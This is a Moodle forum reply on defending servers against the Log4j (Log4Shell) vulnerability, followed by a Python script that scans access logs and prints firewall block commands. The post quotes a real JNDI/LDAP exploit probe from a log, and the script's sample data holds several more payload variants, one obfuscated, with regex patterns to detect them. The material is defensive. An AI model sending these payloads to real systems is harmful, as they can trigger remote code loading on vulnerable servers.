Vulnerability: CVE-2021-44228 Apache Log4j

Re: Vulnerability: CVE-2021-44228 Apache Log4j

by Ken Task -
Number of replies: 0

Been watching this on a Google Compute Engine instance, a RackSpace instance, and an internally hosted VMWare instance of moodle.

From what I read, Apache Solr is listed.

Your server running?   From ssh prompt: ps aux |grep java

Can shut it down by issuing a kill -9 PID

*IF* ... *IF* your moodle site is running Apache Solr for Moodle site search, yes, could be vulnerable.   Fix until fixes are released ... shut down solr ... which is a java applet ... and set your moodle up for the alternative search ... which doesn't use solr.

All my servers have been scanned for vulnerability:

fgrep 'jndi:ldap:' /var/log/httpd/ssl_access_log

or wherever your log files are kept/named.

Example of what you might see:

195.251.41.139 - - [13/Dec/2021:07:36:42 -0600] "GET /$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D HTTP/1.1" 404 238

To add to CentOS 7 drop zone:

firewall-cmd --zone=drop --add-source=195.251.41.139

That's temporary ... a reboot of server will clear that.

Before you do that ... if you do ... do a whois on that IP address.   If that IP is ID'd as part of your provider's blocks of IPs, inquire with provider.   IF provider was being proactive then you might not want to block that IP.   IF provider was not being proactive then you have a 'nosey neighbor' who should keep their nose out of your business ... block it!

On my instances, have seen scans from Digital Ocean blocks of IP's ... among others.   I have no services on DO nor am I using any DO hosted server for anything frontend or backend.   Thus, am considering those DO customers 'bad actors' and have blocked entire ranges of DO's IP's.

Not a 'security expert' ... just My 2 cents!

'SoS', Ken
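The log check and firewall step above, as an added example that is not part of Ken's post or of Moodle. It is a small Python 3 scanner that reads access-log lines, URL-decodes them (the probe in the post arrives as `$%7Bjndi:...%7D`, which a plain `fgrep 'jndi:ldap:'` on the raw log misses), sorts hits into "jndi" (a clear JNDI lookup) and "lookup" (any `${` lookup string, which never belongs in a normal Moodle request and catches obfuscated variants), tallies source IPs, and prints the same `firewall-cmd --zone=drop --add-source=...` lines the post uses. The log lines are constructed with documentation-range addresses; the function names, the decode round limit and the two-tier classification are assumptions of this example. The whois check the post recommends before blocking is left as a manual step.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post): an encoded
# probe in the post's format, a probe in the User-Agent field, an obfuscated
# nested-lookup variant, and one benign Moodle request.
SAMPLE_LOG = """\
203.0.113.10 - - [13/Dec/2021:07:36:42 -0600] "GET /$%7Bjndi:ldap://198.51.100.20:1389/a%7D HTTP/1.1" 404 238
203.0.113.11 - - [13/Dec/2021:07:40:01 -0600] "GET /login/index.php HTTP/1.1" 200 512 "-" "${JnDi:dns://198.51.100.21/x}"
203.0.113.12 - - [13/Dec/2021:07:41:15 -0600] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.22%2Fx%7D HTTP/1.1" 400 0
203.0.113.13 - - [13/Dec/2021:07:42:00 -0600] "GET /course/view.php?id=2 HTTP/1.1" 200 9120
"""

# A ${jndi: lookup, case-insensitive, allowing stray whitespace.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any ${ lookup string at all; legitimate Moodle requests never carry one.
LOOKUP_RE = re.compile(r"\$\{")
# Client address is the first field of common/combined log format.
CLIENT_RE = re.compile(r"^(\S+)")


def decode(text, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded probes also match."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(line):
    """Return 'jndi', 'lookup' or None for one raw access-log line."""
    decoded = decode(line)
    if JNDI_RE.search(decoded):
        return "jndi"
    if LOOKUP_RE.search(decoded):
        return "lookup"
    return None


def scan(lines):
    """Tally source IPs per tier over an iterable of raw log lines."""
    hits = {"jndi": Counter(), "lookup": Counter()}
    for line in lines:
        tier = classify(line)
        if tier is None:
            continue
        match = CLIENT_RE.match(line)
        if match:
            hits[tier][match.group(1)] += 1
    return hits


def block_commands(ips):
    """The runtime (non-persistent) drop-zone command from the post, per IP."""
    return [f"firewall-cmd --zone=drop --add-source={ip}" for ip in sorted(ips)]


if __name__ == "__main__":
    # Replace SAMPLE_LOG.splitlines() with open('/var/log/httpd/ssl_access_log')
    # to run over a real log.
    result = scan(SAMPLE_LOG.splitlines())
    for tier in ("jndi", "lookup"):
        for ip, count in result[tier].most_common():
            print(f"{tier:6} {count:4} {ip}")
    print("# review each address (whois) before running:")
    for cmd in block_commands(result["jndi"]):
        print(cmd)
```

The "lookup" tier is worth reviewing by hand rather than blocking blindly: it is broad on purpose, so a scanner that hides the `jndi` token behind nested lookups still surfaces, while the "jndi" tier is specific enough to feed straight into the drop-zone commands. As the post notes, `--add-source` without `--permanent` lasts only until reboot.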